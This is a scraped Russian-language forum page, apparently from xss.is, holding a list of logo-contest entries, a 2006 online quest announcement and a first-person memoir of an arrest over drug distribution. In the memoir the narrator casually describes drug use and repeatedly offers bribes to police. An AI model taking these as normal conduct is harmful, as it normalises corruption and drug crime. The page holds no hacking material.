46\. Логотип от [lisa99](/members/8789/)
![](https://xss.is/attachments/1877/)



47\. Логотип от [lisa99](/members/8789/)
![](https://xss.is/attachments/1883/)



48\. Логотип от [verzion21](/members/174510/)
![](https://xss.is/attachments/1996/)



49\. Логотип от [Clays](/members/174686/)
![](https://xss.is/attachments/1889/)



50\. Логотип от [malazivka](/members/174690/)
![](https://xss.is/attachments/1891/)



51\. Логотип от [vovklosev](/members/174691/)
![](https://xss.is/attachments/1895/)



52\. Логотип от [Duku1Ra666](/members/174705/)
![](https://xss.is/attachments/1898/)



53\. Логотип от [weilzst](/members/174713/)
![](https://xss.is/attachments/1903/)



55\. Логотип от [DeeXy](/members/174718/)
![](https://xss.is/attachments/1921/)



56\. Логотип от [Landmark](/members/174617/)
![](https://xss.is/attachments/1924/)
![](https://xss.is/attachments/1922/)



57\. Логотип от [buba](/members/174748/)
![](https://xss.is/attachments/1927/)



58\. Логотип от [ventom](/members/174750/)
![](https://xss.is/attachments/1933/)



59\. Логотип от [BL00DFUN](/members/174766/)
![](https://xss.is/attachments/1943/)



60\. Логотип от [Seqonce](/members/174543/)
![](https://xss.is/attachments/1947/)



61\. Логотип от [restellar](/members/174772/)
![](https://xss.is/attachments/1951/)



62\. Логотип от [5mud9e](/members/174661/)
![](https://xss.is/attachments/2000/)



63\. Логотип от [schmitt](/members/174798/)
![](https://xss.is/attachments/1954/)



64\. Логотип от [Maafaaka](/members/174790/)
![](https://xss.is/attachments/1957/)



65\. Логотип от [frAm](/members/174802/)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2FrBfjOLNl.png&hash=76cb71840a9e696c8a403ec622bc44e2)



66\. Логотип от [OUBOU](/members/174810/)
![](https://xss.is/attachments/1960/)



67\. Логотип от [Gegantar$](/members/174812/)
![](https://xss.is/attachments/1997/)



68\. Логотип от [g1oob](/members/174821/)
![](https://xss.is/attachments/1984/)



69\. Логотип от [frAm](/members/174802/)
![](https://xss.is/attachments/1977/)



70\. Логотип от [Fleetch](/members/174827/)
![](https://xss.is/attachments/1978/)



71\. Логотип от [ZeroTwo](/members/174837/)
![](https://xss.is/attachments/1981/)



72\. Логотип от [Murka](/members/174564/)
![](https://xss.is/attachments/1999/)



73\. Логотип от [DE](/members/1748/)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2Fr50JuUH.jpg&hash=5e318b931a79da14c11192fb8b3a9111)



74\. Логотип от [BestLogs](/members/174676/)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2FXidhmDc.jpg&hash=46a73d662e9a802822f67ede31310f6c)



75\. Логотип от [Levio_Fun](/members/174851/)
![](https://xss.is/attachments/2010/)



76\. Логотип от [lisa99](/members/8789/)
![](https://xss.is/attachments/2014/)



77\. Логотип от [redo1](/members/174848/)
![](https://xss.is/attachments/2025/)

Конкурс-квест "Первый на Луне"

Author: SM@x • 2006-04-11T21:19:58+0000 • Replies: 120 • Views: 42K
**Первый на Луне** ​


Конкурс-квест "Первый на Луне" в честь праздника "День космонавтики".
Старт в 20-00 (МСК)

**Разработчик(и):** [Конкурса.НЕТ](http://konkursa.net)
**Спонсор(ы):** [DaMaGeLaB](http://xss.is/)
**Приз(ы):** 8-мизначный ICQ#71171171 (inv) + бонусы
**Обсуждение:** только в этой теме
**Описание:** Квест, в ходе которого Вам предстоит собрать каркас ракеты,
подобрать экипаж, найти секретный код запуска ракеты, и отправиться на Луну.
**Задание:** _Пройти квест от начала до конца, доказав в конце, что Вы
побывали на Луне первым_

**Примечания** :
1 - для старта Вам необходимо написать **I 've started QUEST**, в противном
случае-победа Вам не будет засчитана!
2 - не нужно предлагать _свои догадки_ в качестве ответа на конкурс, это квест
и его нужно проходить
3 - используемые расширения файлов в конкурсе стандартные
4 - подсказки просим ТОЛЬКО на форуме в теме обсуждения
5 - во время прохождения Вам будут встречаться бонусы, тот кто соберет макс.
количество - получит шоху в подарок! Для этого Вам необходимо первым постить в
этой теме секр. код каждого найденного бонуса; второе место по кол-ву
собранных бонусов - семизнак для утехи
6 - призы высылаются только по окончании конкурса


[------------------>> [СТАРТ!](http://konkursa.net/konkurs/1/)
<<\------------------]​


\---
квест стартовал, удачи!

Истории от Бандита

Author: SmokeSalvia • 2022-10-25T12:48:52+0000 • Replies: 132 • Views: 41K
**ФСБ vs ОБНОН. (Часть 1)**
X- не английская буква икс, а русская буква Хэ. Ещё она выглядит как крест,
который можно было поставить на моей прежней жизни в тот день, так как после,
начнется новая жизнь. Впрочем, это уже другая история. За день до дня Хэ, из
города N еду в Сочи, уладить кое-какие дела, по пути заезжаю на винный завод
где-то на юге России, чтобы ко дню рождения привезти друзьям лето на Урал.
Закупаюсь и загружаю в багажник коробки с вином, коньяком, настойками и
различными наливками. В южном городе N мы купили квартиру, переехав из
Екатеринбурга месяца назад, поближе к солнцу и морю, подальше от сырых и
хмурых Уральских гор. Вечером приезжаю обратно, достаю из коробки бутылку
коньяка и настойку, в магазине у дома докупаю яблочный сок, шоколад, боржоми
наутро и пачку Marlboro, поднимаюсь на пятый этаж, открываю дверь ключом, мв
вчера вырубили грамм дживика и Salvia сидит на кухне.
— Я приехал — кладу шоколадку и минералку на стол.
— Закажем еды на дом?
— Давай — Сальвия только проснулась, сидит на стуле и тянется за боржоми.
— Что хочешь? — спрашиваю.
— Креветочный бургер.
— Якитория значит. — включаю компьютер, заказываю на сайте "Якитория" пару
бургеров, роллы темпура, шоколадные роллы, мидии, утку с соусом и морс.
Переодеваюсь и проверяю мессенджеры. Включаю TV по России 24 "люди в чёрном",
улавливаю слова: стагнация, рецессия и убавляю звук до минимума. Ищу в инете
кинчик под который будем кушать прямо в кровати и в одних трусах. Успеваю
накатить пару стаканов наливки, привозят еду, отдаю деньги:
— Нет. Сдачи не надо. —говорю доставщику с ростовским акцентом и закрываю за
ним дверь.
Выкладываем всё из пакетов на кровати, включаю кинчик и открываю коньяк, чтобы
смешать его с яблочным соком, после еды выхожу на балкон покурить, в одной
руке стакан с кониной, в другой сигарета, на улице тепло, хотя ещё март месяц,
снега нет, трава зелёная, рядом новый микрорайон строят.
— Бля, охуенно. — сплевываю и кажется один мужик с улицы смотрит прямо на
меня, на улице стояла лавочка, два человека сидят спиной к дому и пьют пиво,
один стоит напротив них и палит. Странно, но мало ли айболов на Земле? Кидаю
бычок в их сторону и захожу в комнату. Занимаемся любовью, чувствую, что к
моей жопе прилипли семечки кунжута от бургеров, Выпиваю ещё пару стаканов
коньяка и мне становится абсолютно похую на семечки кунжута. Коньяк
закончился, а наливка не зашла, чтобы догнаться и уснуть не хватает малость,
одеваю джинсы и тащусь в магазин за пивом, меня шатается, закуриваю сигу по
пути, во дворе тишина. Купив пива, захожу домой и скидываю с ног "изитоны",
захожу в комнату и падаю растянувшись на ковре.
— Че за х#йня? — думаю — на ровном месте упал, локоть сожрал. Делаю пару
глотков пива и вырубаюсь.
Утро. Просыпаюсь от того, что запищал брелок от машины, вчера я поставил её с
торца дома, где не было возможности увидеть, что происходит. Голова гудит,
промелькнула мысль что какая-то "тпшка", сдавая задом, вьебалась в тачку,
натягиваю штаны, футболку и в тапочках выхожу на лестничную клетку. Вдруг
слышу голос:
— Ну здравствуй, господин Smokе. Бац. Приехали. Сверху и снизу лестницы
подходят люди в штатском и мусорской форме, а на запястьях застегиваются
наручники.
— Удостоверение — говорю.
— Пожалуйста. —человек в костюме, разворачивает перед моим лицом удостоверение
из города Екатеринбурга. Открывают двери в квартиру, кричу Сальвии:
— К нам мусора в гости. Оказывается этими гостями были четверо из Екб:
сотрудник ФСБ, начальник обнона со своей шестёркой опером и следователем
главного следственного УПРАВЛЕНИЯ ( ГСУ), еще несколько мусоров из местного
отдела, которые были тут для мебели, вставляя неуместные слова и афоризмы в
разговор. У меня сушняк, смотрю наливка стоит на полу, сделав пару шагов к
ней, они меня тормозит местная легавая собака:
— Нельзя! Стой на месте.
"Земляки" в это время шмонают хату, хотя то, что им надо на виду: ноутбук,
планшет, телефон, симки и банковские карты. Но шмонают на отьебись, что даже
не замечают на кухонном столе остатки дживика, а в машине пропустят банковскую
карту. Видимо ни у одного меня сегодня похмелье. Спрашиваю кто у них главный,
оказывается начальник ОБНОНа.
— Пойдем на кухню покурим? — говорю ему.
— Я с тобой водку не пил, чтобы переходить на Ты. —отвечает мне, но на кухню
всё же проходим.
— Что у вас тут так грязно? — смотрит на стол.
— Новоселье отмечали.
— Сколько вам надо денег, чтобы утопить рюкзак с техникой в реке? —спрашиваю.
— Слишком много людей в курсе, здесь и в Екатеринбурге.
— Я не беру в счёт Екатеринбург, а только вас. Скажите, что при мне не было
никакой техники и всё: нет тела, нет дела. — по его лицу можно было прочитать,
что он не против, но я тогда не знал, что с ними "фейсер" присланый видимо для
их контроля и они не могут отойти от предназначенных директив.
— Нет, не получится, на поимку вашей банды были все службы задействованы,
разве что только МЧС не было. Лучше расскажи, кто у вас делает оптовые
закладки и мы оставим тебя дома, под подпиской.
— Я не могу этого сделать, это будет нехорошо с моей стороны.
— Мы уже всех вас взяли, остался один. Кто он?
— Я не знаю, беру 51 статью. — тушу бычок об стол. Вот и поговорили.
Возвращаемся в комнату, понятые соседи не понимают, что происходит: нет ни
трупа, ни наркотиков, ни оружия. Опечатывают технику и просят их расписаться.
Фейсер докладывает своему начальству об успешном ходе операции, заказывает по
телефону пять билетов до Екб через Москву, тут я понимаю, что под подпиской
меня вряд ли оставят. Опер говорит Сальвии собрать мне вещи в дорогу, на Урале
ещё типа зима, тёплые вещи пригодятся. Я одеваюсь, Сальвия передает мне
рюкзак, мы обнимаемся и целуемся на прощание, выхожу на лестницу в окружении
мусоров, на мне наручники к которым застегнуты ещё одни наручники к руке
опера, который ведет меня к машине. Сажусь на заднее сиденье, по бокам два
мусора, впереди еще двое и куда-то едем. За нами еще одна машина.
— Пиздец, я че Башни-близнецы взорвал? —думаю — 2000 км, и не в лом же им было
лететь за мной сюда из Екб. Приехали. Оказывается местный мусорской отдел.
Местные полицейские - двое армяшек, как братья близнецы, просят отдать им их
наручники, составить протокол и поскорее уезжать. Если бы меня оставили на
попечение этим Болеку и Лёлику, я бы на следующий день пересекал канадскую
границу, настолько жалкими они были по сравнению с гостями из Екатеринбурга.
Но... мы едем дальше. "Земляки" вызывают такси от отдела до гостиницы,
приезжает две машины, садимся в том же порядке, как и приехали сюда. Водила
спрашивает:
— Вы, этих теперь так возит? — Меня удивило отношение людей, когда вчера еще
звучало: — Уважаемый куда поедем? — в слово "этих", с презрением, только
потому, что на мне наручники я уже изгой общества, не обвинённый, но уже
бесправный.
— У меня брат "оттуда" недавно вышел. Нечего там делать. — говорит таксист
кубаноид.
— А вот наш жулик рвётся туда, не хочет колоться. — подкалывают меня.
— Это ты зря мужик. — поддакивает им шофёр.
— Сука, конченный. — думаю.
Останавливаемся у отеля со звездами, какое-то там супер-пупер "Пэлас", видимо
те кто носят звезды, выбирают себе гостиницы тоже со звездами и чем больше,
тем лучше, тем более за счёт государства. Выходим из машины, нас встречает
швейцар в белых перчатках у стеклянной вращающейся двери, прямо как в сериале
Элеон. Я пристёгнут наручниками к оперу, проходим в фойе, они берут у
администратора ключи и мы идём к лифту. Лифт поднимается на третий этаж, у них
два номера рядом, захожу в левую дверь, в которой жил следак и опер.
Сажусь на стул пока они упаковывают вещи в сумки.
— Дайте мне позвонить, у меня есть право на звонок?
— Звони — опер держит в руке смартфон для набора. Я не помню ни одного номера
кроме Сальвии и Ма, Сальвии звонить нет смысла, её телефон лежит здесь
опечатанный, набираю Ма с третьей попытки, так как забыл цифры. Опер нажимает
на громкую связь.
— Алло, мам, меня полиция забрала.
— Как?
— Я не могу говорить много, мы сейчас едем в аэропорт, а потом в Екатеринбург.
Сальвия одна осталась дома. — выключаю телефон, так как опер уже навострил
свои уши.
— Ну что жулик попался? — говорит опер.
— Почему жулик? Есть такое как презумпция невиновности. — говорю ему.
— Это что такое? — спрашивает меня. Я в ахуе. Он работает на такой должности и
не знает, что такое презумпция невиновности. Пока я сижу и думаю: стебается он
или нет, в разговор влез следователь ГСУ, которого за спиной они называли -
голубой.
— Презумпция невиновности - это когда человека нельзя считать виновным пока
его вина не будет доказана в суде.
— Доказываете, это ваша работа — дополняю. Как сейчас помню, я неплохо отбивал
их атаки, пока голова была свежая хоть и с лютого похмелья.
— Ладно, пойдём посидишь в комнате с начальством. Захожу в правую дверь, номер
фейсера и обноновца, они лежат на кроватях и смотрят "Следствие ведут
знатоки", сажусь на стол возле окна и думаю может съебаться через окно? Успею
ли? Невысоко так-то... Мысли обрывает нач.обнон.
— Давай пиццу закажем? Ты будешь пиццу? —спрашивает меня.
— Нет, спасибо.
— Какую тебе? Выбирай.
— Не хочу.
— Я вот мясо не ем. Макар! Иди закажи одну с мясом, другую с сыром и пива
господину Смоку. Да? — смотрят на меня. Киваю головой:
— Я хотел взять бутылку наливки.
— А что не взял?
— Местный полицейский не дал.
— Да они тут все уёбки!
Макар верноподданный начальника обнона убегает в фойе. Фейсер немногословен,
только молчит и наблюдает краем глаза за мной.
— Вы наверное звёзды на погоны получите? —спрашиваю.
— Да нет, — зарделся "начоб", — мы просто исполняем свою работу.
— Премию тогда? Нифига сколько денег государство потратило на мою поимку:
самолёты, отели, командировочные...
— У нас мало денег, поскорее бы уже на пенсию. — говорит НАЧОБ отсвечивая
золотыми часами и немного занервничал, когда услышал, что государство
потратило деньги.
— Так давайте я внесу свой вклад в борьбу с преступностью?
— Предлагаешь взятку?
— Нет, всякая работа должна быть оплачена.
— Лучше расскажи кто у вас четвёртый, этим поможешь себе скостить срок.
— Не понимаю о чём вы.
— Ладно посидишь в СИЗО, может по разговорчивее будешь.
Приходит Макар, приносит пиццу и две бутылки пива по 0,33, одну отдает мне.
— Спасибо — во рту с вечера не было ни капли жидкости, почти сразу всё
выпиваю.
— Держи пиццу! — Макар суёт мне кусок пиццы.
— Не надо! — есть не хотелось совсем.
— Держи! — вкладывает мне в руки кусок мясной пиццы, потом
сырной.![1666702048.jpg](https://xss.is/attachments/44544/)